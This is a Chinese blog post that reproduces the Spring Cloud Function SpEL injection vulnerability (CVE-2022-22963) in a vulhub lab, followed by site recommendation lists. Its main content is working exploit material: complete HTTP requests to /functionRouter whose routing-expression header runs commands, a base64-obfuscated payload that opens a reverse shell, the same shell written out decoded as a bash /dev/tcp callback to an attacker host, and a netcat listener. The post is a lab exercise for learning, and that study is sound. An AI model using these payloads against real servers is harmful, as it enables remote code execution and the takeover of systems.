Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现

最新推荐文章于 2024-05-30 11:35:05 发布
最新推荐文章于 2024-05-30 11:35:05 发布
阅读量278 收藏 2
点赞数 5
分类专栏: vulhub漏洞复现 文章标签: spring cloud spring 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54786196/article/details/134084982
版权

一、漏洞简介

Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。

由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。

影响版本

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

二、环境搭建

192.168.233.129 #vuluhub靶场/靶机
192.168.233.144 #攻击机/反弹shell

vulhub-master/spring/CVE-2022-22963
docker-compose up -d

三、漏洞复现

访问环境地址

http://192.168.233.129:8080/

访问 /functionRouter 抓包

修改为

poc

POST /functionRouter HTTP/1.1
Host: 192.168.233.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.69
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

发送数据包,则会执行 touch /tmp/success 命令

进入容器查看

docker ps  #查看容器id

docker exec -it 1c120a852200 /bin/bash进入容器

查看文件,success创建成功

四、建立反弹shell

攻击机开启监听端口

nc -lvvp 6666

发送数据包

poc2

POST /functionRouter HTTP/1.1
Host: 192.168.233.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.69
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yMzMuMTQ0LzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 4

test

反弹shell命令  bash -i >& /dev/tcp/192.168.233.144/6666 0>&1

将  touch /tmp/success 替换为编码后的结果

 bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yMzMuMTQ0LzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}

监听中成功接受到了shell

YiHua_yiye
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Spring Cloud Function SpEL表达式注入(CVE-2022-22963)
做自己喜欢的事,并将其发挥到极致!
04-02 1217
文章目录声明前言一、漏洞概述二、影响版本三、本地复现四、漏洞原理五、官方修复文档 声明 本文章仅用于漏洞复现和技术学习,切勿从事非法渗透行为,切记! 前言 在 Spring Cloud Function 版本 3.1.6、3.2.2 和不受支持的旧版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问。 一、漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由 funct
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
CVE-2022-22963Spring Cloud Function SpEL 远程代码执行漏洞
m0_59092234的博客
09-02 841
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
CVE-2022-22963-Spring-Core-RCE图形化利用工具_poc-yaml-cve-2022-22963-spring-spel-rce
2401_83944297的博客
04-17 480
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 2940
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
weixin_45715461的博客
07-10 2422
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
Spring Cloud Function现RCE 0-day漏洞
HongYu012的博客
03-27 8288
近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL 表达式注入漏洞,可利用该漏洞通过注入 SPEL 表达式来触发远程命令执行Spring Cloud Function 是一个基于 Spring Boot 的函数计算框架。通过抽象传输细节和基础设施,为开发者保留熟悉的开发工具和开发流程,让开发者专注于实现业务逻辑,从而提高开发效率。 Spring Cloud Function 是一个具有以下高级目标的项目: 通过函数促进业务逻辑
Spring Cloud Function SPEL表达式注入漏洞CVE-2022-22963
m0_67391521的博客
08-24 433
官方目前发布了修复此漏洞的 commit:https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f,可下载官方的修复代码重新编译打包。下载地址:https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE。创建url.txt,内容为http://192.168.42.143:8080/
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
不曾扬帆,何以至远方
07-18 2431
Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
漏洞复现Spring Cloud Function SPEL表达式注入漏洞cve-2022-22963
Hi~ 土拨鼠
04-01 1460
文章目录1、复现环境2、构造POC3、在vps上开启监听4、执行POC,成功反弹shell 1、复现环境 本文是在vulfocus在线环境进行的复现:http://vulfocus.io/ 2、构造POC 由描述可知需要构造请求包,添加spring.cloud.function.routing-expression参数,内容会被作为spel表达式解析 由于java中不支持管道符和特殊符号,所以将反弹shell的命令用base64进行编码处理 spring.cloud.function.routing-ex
Spring Cloud Function SpEL注入漏洞CVE-2022-22963)分析
AKAMAI_CHINA的博客
01-01 434
2022年3月24日,Pivotal修补了Spring Cloud Function中一个关键的服务器端代码注入漏洞Spring表达式语言注入),该漏洞有可能导致系统被攻击。
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹...
SpringBoot集成腾讯COS流程
最新发布
weixin_67727883的博客
05-30 277
SpringBoot集成腾讯COS流程
SpringBoot 的 Java 代码配置(二)
xiaotu的博客
05-29 1187
因此,如果使用 HikariCP 只用声明你要用它就行,而声明要使用 Druid,你需要自己指定所使用的版本。上面的 DruidDataSource ,我们为其属性赋值时,它的四个属性都是简单类型属性,因此十分容易处理。但是,在 Spring 的容器中,Java Bean 可能会存在引用。在上面的 Druid 的配置中,数据库连接的四大属性值是在代码中『写死』的。而在 Java 代码配置中,通过 @Bean 方法的入参来表达 Bean 之间的引用关系。,所以,我们可以直接将自定义的配置项写在。
SpringMVC 数据映射VC
weixin_45939821的博客
05-29 746
从 view 层发送请求到Controller,在Controller中获取参数: 在不输入值时会报400,参数错误 在不输入值时num默认为null 没有找到对应标签名称叫nums的,输入任何值时都报400 设置required默认值为false,即使表单没有nums也不会报错 设置defaultValues,参数num的默认值为1 可以直接给对象的属性赋值
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpELSpring Expression ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值